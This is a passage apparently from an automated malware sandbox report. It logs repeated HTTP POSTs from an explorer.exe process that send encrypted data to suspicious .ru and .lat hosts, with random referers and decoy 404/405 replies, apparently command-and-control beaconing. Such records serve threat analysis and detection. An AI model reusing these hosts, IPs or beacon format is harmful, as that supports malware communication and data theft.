                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.549964194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:44.194433928 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jghirgxdfdtfej.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 264
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:44.194447041 CET264OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ae 18 39 d5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)9E@GR}`1" a;v^ ,OqhH.$!e.@t+CGcu)>%o|X`Wc<{KMitXb=)!@IgeId4X
                                            Dec 19, 2024 10:59:45.534571886 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.54997094.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:46.558182001 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://aemrvdevcrdbnu.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 130
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:46.558239937 CET130OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fb 1c 32 d4
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)2:XFDq2$g+e]+px
                                            Dec 19, 2024 10:59:47.910084963 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:47 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.54997394.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:48.040641069 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://caegqqrnvwyec.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 273
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:48.040652037 CET273OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f4 4a 47 a1
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)JG3,_A~S-<j*L50;8a`T@luq_XSs'[<v{(a&9)R6haaPq<n.8lI[~`5@q=RBHC
                                            Dec 19, 2024 10:59:49.390717983 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:49 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.549977194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:49.522432089 CET280OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gnjdvgwpgdpin.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 200
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:49.522479057 CET200OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 88 14 56 ac
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)V/D52I0p/$8P0Y3QH0t3`~i#zy-Yu`%ay6e+{0n
                                            Dec 19, 2024 10:59:50.862988949 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.54999394.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:55.240689993 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://randrxuiexkkd.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 264
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:55.241559029 CET264OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9b 19 3f c9
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)?+O]@zwjKjBZ7^&AVqoSSAGkhG)mx?a/Q\}*)Fzo#rq3Q6y3s%,<ZuHrGUzd
                                            Dec 19, 2024 10:59:56.609649897 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:56 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.54999594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:56.737485886 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://egkbqdynffoi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 166
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:56.737519979 CET166OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8a 04 3f a8
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)?%(+Pv99D2f\X5m'PAvBYbPKQupke*^
                                            Dec 19, 2024 10:59:58.091754913 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:57 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.550000194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:58.232085943 CET279OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jkpvubjbjugu.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 116
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:58.232085943 CET116OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 23 79 83
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)#yW0_e_bO!]
                                            Dec 19, 2024 10:59:59.568881035 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:59 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.55000194.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:04.837919950 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://pekwfbrjnpwbirs.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 326
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:04.837968111 CET326OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e7 4a 2e a2
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)J.&:wR-l;\%oM[#iD30wyxB|q'P)y#A3E\vSsAf_yyzPyor!*9:eizYpFUq
                                            Dec 19, 2024 11:00:06.200352907 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:05 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.55000294.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:06.324534893 CET287OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rllvcebkwfymagl.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 260
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:06.324534893 CET260OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be aa 1b 2d 9e
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)-,TueP/n;YK{T=-/ujh]fNPcs}qe=tl+&R,j|)\oJRmAF |Ei:N/Ta5tKz$\
                                            Dec 19, 2024 11:00:07.849044085 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:07 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
